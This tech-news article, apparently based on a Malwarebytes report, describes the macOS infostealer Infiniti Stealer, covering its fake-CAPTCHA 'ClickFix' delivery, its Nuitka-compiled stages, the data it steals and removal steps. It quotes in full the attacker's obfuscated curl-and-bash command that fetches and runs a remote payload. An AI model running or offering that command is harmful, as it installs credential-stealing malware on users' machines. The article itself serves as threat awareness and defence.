Infiniti Stealer: New macOS Infostealer Malware

Imagine pasting a 'CAPTCHA fix' into Terminal, only to hand your Mac's keys to hackers. Infiniti Stealer is here, blending old-school tricks with cutting-edge compilation to plunder browsers, wallets, and Keychain.

Fake CAPTCHA page dropping Infiniti Stealer payload on macOS Terminal

Key Takeaways

  • Infiniti Stealer uses ClickFix social engineering via fake CAPTCHAs to bypass macOS defenses without exploits.
  • Nuitka-compiled Python makes the stealer native, evading typical detection and analysis.
  • First documented macOS case blending ClickFix with Nuitka—predict more cross-platform threats ahead.

Fingers flying—paste, Enter, done. That fake CAPTCHA on update-check[.]com just turned your Mac into a data piñata.

Zoom out: we’re staring down Infiniti Stealer, a fresh macOS infostealer that operators tried to hide under the codename NukeChain. But poof—their control panel leaked, spilling the real name. This beast doesn’t crash through vulnerabilities like some brute-force Windows worm. No. It sweet-talks you into Terminal, using ClickFix: social engineering’s slickest con.

And here’s the twist that fires me up (in a terrifying way): Python, that scrappy scripting language powering AI’s wild frontier, now Nuitka-compiled into native Mac binaries. It’s like giving a pickpocket a cloaking device—harder to spot, tougher to dissect. macOS users, wake up. The platform shift isn’t just shiny LLMs; it’s thieves adapting faster than antivirus labs.

How ClickFix Turns You into the Exploit

ClickFix. Sounds harmless, right? Wrong.

Picture this: you’re on a dodgy site, hit a “Verify you’re human” wall mimicking Cloudflare. Instructions pop: Cmd+Space, Terminal, paste this gem:

bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 –decode))

Boom. Decodes to their dropper. You ran it yourself—no exploit needed. Defenses? Bypassed. It’s Windows ClickFix reborn for Apple Silicon, instructions tuned just right. Social engineering at warp speed.

This isn’t lazy hacking. It’s genius. Why burn zeros on zero-days when gullible clicks are free?

Stage by Stage: The Infiniti Onslaught

Stage 1 drops via Bash—echoes MacSync stealers, hinting at a malware marketplace boom. Decodes payload, dumps Stage 2 to /tmp, strips quarantine with xattr, fires it nohup-style. Passes C2 deets as env vars. Then—AppleScript magic—wipes itself, slams Terminal shut. Poof, ghost in the machine.

Stage 2? Nuitka loader. 8.6MB Mach-O for M-series chips. KAY header screams zstd-compressed Python guts. Unlike PyInstaller’s bloat, Nuitka spits native C—from source to silicon. Decompresses 35MB, unleashes Stage 3.

That final payload—UpdateHelper[.]bin—Python 3.11 stealer, Nuitka’d to hell. Symbols galore let analysts peek inside: Chromium creds, Firefox cookies, Keychain loot, crypto wallets, .env secrets, even screenshots mid-heist. HTTP POSTs it all home. But smart: sniffs analysis sandboxes (any.run, Joe Sandbox, VMs), random delays to dodge bots. Finish line? Telegram ping to the thief, queuing passwords for cracking.

Wild, isn’t it? Python’s platform-agnostic vibe—fueling tomorrow’s AGI—now arming cross-OS crooks.

My Bold Call: macOS Malware’s Windows Moment

Here’s my unique spin, absent from the threat report: this reeks of 2006’s leap, when Windows viruses like Storm Worm flooded Macs as Apple boomed. Back then, OS X felt invincible. Now? Infiniti signals Python stealers going native everywhere. Predict it: by 2025, Nuitka kits flood underground markets, macOS infections rival Windows. Not hype—logic. Attackers love easy tools; defenders chase binaries.

Operators’ PR spin? Nah, this panel leak screams amateur hour masking pro craft. Skeptical? Me too—but the tech’s solid.

Why Can’t Antivirus Catch This?

Nuitka’s the ninja move. Python scripts scream “malware” to sig scanners. Compiled natives? Blend in like legit apps. Add user-executed drops—no network red flags—and you’ve got a ghost. Evasion checks? Chef’s kiss.

But it’s not invincible. Check /tmp, ~/Library/LaunchAgents. Malwarebytes sniffs it. Still—proactive beats reactive.

Caught in the ClickFix Trap? Fight Back Now

Stopped banking on that Mac? Good. Swap to clean device, nuke passwords (email first, Apple ID, banks). Revoke sessions, API keys, SSH. Hunt stragglers in usual spots. Scan deep.

Golden rule: Websites dictating Terminal? Slam browser shut. Your Mac’s no museum piece—it’s a fortress. Act like it.

And wonder this: as AI platforms shift everything, will stealers Nuitka their way into agentic futures? Exciting times. Terrifying ones.


🧬 Related Insights

Frequently Asked Questions

What is Infiniti Stealer and how does it infect Macs?

Infiniti Stealer is a macOS infostealer delivered via fake CAPTCHA pages using ClickFix—tricking you into pasting a Terminal command that downloads and runs a multi-stage payload.

Does Infiniti Stealer work on Apple Silicon Macs?

Yes, it’s compiled as native Mach-O binaries for Apple Silicon, using Nuitka to package Python into hard-to-detect executables.

How do I remove Infiniti Stealer from my Mac?

Check /tmp and ~/Library/LaunchAgents for suspicious files, change all passwords from a clean device, revoke sessions, and run a Malwarebytes scan.

Marcus Rivera
Written by

Tech journalist covering AI business and enterprise adoption. 10 years in B2B media.

Frequently asked questions

What is Infiniti Stealer and how does it infect Macs?
Infiniti Stealer is a macOS infostealer delivered via fake CAPTCHA pages using ClickFix—tricking you into pasting a Terminal command that downloads and runs a multi-stage payload.
Does Infiniti Stealer work on Apple Silicon Macs?
Yes, it's compiled as native Mach-O binaries for Apple Silicon, using Nuitka to package Python into hard-to-detect executables.
How do I remove Infiniti Stealer from my Mac?
Check /tmp and ~/Library/LaunchAgents for suspicious files, change all passwords from a clean device, revoke sessions, and run a Malwarebytes scan.

Worth sharing?

Get the best AI stories of the week in your inbox — no noise, no spam.

Originally reported by Malwarebytes Labs

Stay in the loop

The week's most important stories from theAIcatchup, delivered once a week.